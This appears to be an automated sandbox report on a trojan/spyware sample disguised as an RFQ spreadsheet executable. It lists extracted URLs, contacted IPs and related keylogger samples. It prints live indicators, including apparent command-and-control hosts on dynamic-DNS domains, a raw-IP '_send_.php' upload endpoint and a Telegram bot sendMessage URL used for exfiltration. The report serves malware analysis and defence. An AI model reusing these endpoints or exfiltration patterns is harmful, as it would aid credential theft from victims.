                                                                                          https://www.office.com/pInstallUtil.exe, 00000005.00000002.2990704063.0000000002D83000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallInstallUtil.exe, 00000005.00000002.2994301420.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003E23000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003C55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003EFA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003C80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchInstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://checkip.dyndns.org/qRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://chrome.google.com/webstore?hl=enlBInstallUtil.exe, 00000005.00000002.2990704063.0000000002D5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.galapagosdesign.com/DPleaseRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.fonts.comRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.sandoll.co.krRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.urwpp.deDPleaseRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.zhongyicts.com.cnRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInstallUtil.exe, 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.sakkal.comRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exefalse
                                                                                                                    		high
                                                                                                                    https://reallyfreegeoip.org/xml/RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002BED000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exefalse
                                                                                                                        		high
                                                                                                                        https://www.office.com/InstallUtil.exe, 00000005.00000002.2990704063.0000000002D92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002D83000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.apache.org/licenses/LICENSE-2.0RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.fontbureau.comRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://sectigo.com/CPS0RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exefalse
                                                                                                                                		high
                                                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoInstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://checkip.dyndns.orgInstallUtil.exe, 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016InstallUtil.exe, 00000005.00000002.2994301420.0000000003F1F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003C78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003CED000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003E1C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002CA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=InstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://www.ecosia.org/newtab/InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://www.carterandcone.comlRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://aborters.duckdns.org:8081RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://www.founder.com.cn/cn/RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478037027.0000000006850000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                https://ac.ecosia.org/autocomplete?q=InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://www.fontbureau.com/designers/cabarga.htmlNRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://www.founder.com.cn/cnRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://www.fontbureau.com/designers/frere-user.htmlRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://anotherarmy.dns.army:8081RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exefalse
                                                                                                                                                            		high
                                                                                                                                                            http://www.jiyu-kobo.co.jp/RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://reallyfreegeoip.org/xml/8.46.123.189$InstallUtil.exe, 00000005.00000002.2990704063.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002C5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://reallyfreegeoip.orgInstallUtil.exe, 00000005.00000002.2990704063.0000000002C5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002BED000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://www.fontbureau.com/designers8RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesInstallUtil.exe, 00000005.00000002.2994301420.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003E23000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003C55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003EFA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003C80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://ocsp.sectigo.com0BRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exefalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high

                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                          Public IPs

                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                          104.21.48.1
                                                                                                                                                                          		reallyfreegeoip.orgUnited States
                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                          149.154.167.220
                                                                                                                                                                          		api.telegram.orgUnited Kingdom
                                                                                                                                                                          		62041TELEGRAMRUfalse
                                                                                                                                                                          193.122.130.0
                                                                                                                                                                          		checkip.dyndns.comUnited States
                                                                                                                                                                          		31898ORACLE-BMC-31898USfalse
                                                                                                                                                                          104.21.80.1
                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                                                                                                          General Information

                                                                                                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                          Analysis ID:1587370
                                                                                                                                                                          Start date and time:2025-01-10 09:27:07 +01:00
                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                          Overall analysis duration:0h 5m 55s
                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                          Report type:full
                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                          Number of analysed new started processes analysed:7
                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                          Technologies:
                                                                                                                                                                          • HCA enabled
                                                                                                                                                                          • EGA enabled
                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                          Sample name:RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
                                                                                                                                                                          Detection:MAL
                                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@3/1@4/4
                                                                                                                                                                          EGA Information:
                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                          HCA Information:
                                                                                                                                                                          • Successful, ratio: 99%
                                                                                                                                                                          • Number of executed functions: 156
                                                                                                                                                                          • Number of non-executed functions: 30
                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                                                                          Warnings

                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 2.23.242.162, 20.12.23.50, 13.107.246.45, 172.202.163.200
                                                                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                          • VT rate limit hit for: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe

                                                                                                                                                                          Simulations

                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                          03:28:14API Interceptor226x Sleep call for process: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe modified
                                                                                                                                                                          03:29:19API Interceptor1887x Sleep call for process: InstallUtil.exe modified

                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                          IPs

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          104.21.48.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                                          • twirpx.org/administrator/index.php
                                                                                                                                                                          SN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.antipromil.site/7ykh/
                                                                                                                                                                          149.154.167.220https://marcuso-wq.github.io/home/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                    fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                      Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                        Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          gem1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              193.122.130.0Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • checkip.dyndns.org/
                                                                                                                                                                                              SOA NOV. Gateway Freight_MEDWA0577842.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • checkip.dyndns.org/
                                                                                                                                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • checkip.dyndns.org/
                                                                                                                                                                                              Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • checkip.dyndns.org/
                                                                                                                                                                                              Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • checkip.dyndns.org/
                                                                                                                                                                                              VSLS SCHEDULE_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • checkip.dyndns.org/
                                                                                                                                                                                              ungziped_file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                              • checkip.dyndns.org/
                                                                                                                                                                                              New order 2025.msgGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                              • checkip.dyndns.org/
                                                                                                                                                                                              file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                              • checkip.dyndns.org/
                                                                                                                                                                                              image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • checkip.dyndns.org/

                                                                                                                                                                                              Domains

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              checkip.dyndns.comTepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 193.122.130.0
                                                                                                                                                                                              PO#3_RKG367.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                              • 158.101.44.242
                                                                                                                                                                                              SOA NOV. Gateway Freight_MEDWA0577842.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 193.122.130.0
                                                                                                                                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 193.122.130.0
                                                                                                                                                                                              #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 132.226.247.73
                                                                                                                                                                                              fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 132.226.247.73
                                                                                                                                                                                              fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 132.226.8.169
                                                                                                                                                                                              1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 132.226.247.73
                                                                                                                                                                                              jqxrkk.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 132.226.8.169
                                                                                                                                                                                              Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 193.122.130.0
                                                                                                                                                                                              reallyfreegeoip.orgTepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 104.21.32.1
                                                                                                                                                                                              PO#3_RKG367.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                              • 104.21.80.1
                                                                                                                                                                                              SOA NOV. Gateway Freight_MEDWA0577842.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 104.21.64.1
                                                                                                                                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 104.21.96.1
                                                                                                                                                                                              #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 104.21.96.1
                                                                                                                                                                                              fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 104.21.64.1
                                                                                                                                                                                              fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 104.21.112.1
                                                                                                                                                                                              1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 104.21.96.1
                                                                                                                                                                                              jqxrkk.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 104.21.16.1
                                                                                                                                                                                              Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 104.21.16.1
                                                                                                                                                                                              api.telegram.orghttps://marcuso-wq.github.io/home/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              gem1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220

                                                                                                                                                                                              ASNs

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              CLOUDFLARENETUShttps://ctrk.klclick3.com/l/01JGXREPA9AKCFABSME4GFWDDZ_0#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.66.43.95
                                                                                                                                                                                              http://www.singhs.lvGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                              • 104.18.11.207
                                                                                                                                                                                              http://18ofcontents.shopGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.21.96.1
                                                                                                                                                                                              https://www.dcamarketintelligence.com/tdtGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.26.15.92
                                                                                                                                                                                              1162-201.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • 104.21.64.1
                                                                                                                                                                                              https://cdn.btmessage.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 172.67.74.232
                                                                                                                                                                                              http://www.austrata.net.auGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 1.1.1.1
                                                                                                                                                                                              https://www.cineuserdad.ecGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              https://form.fillout.com/t/emEtLm993dusGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.26.1.150
                                                                                                                                                                                              https://form.fillout.com/t/emEtLm993dusGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.17.25.14
                                                                                                                                                                                              TELEGRAMRUhttps://marcuso-wq.github.io/home/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              gem1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              CLOUDFLARENETUShttps://ctrk.klclick3.com/l/01JGXREPA9AKCFABSME4GFWDDZ_0#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.66.43.95
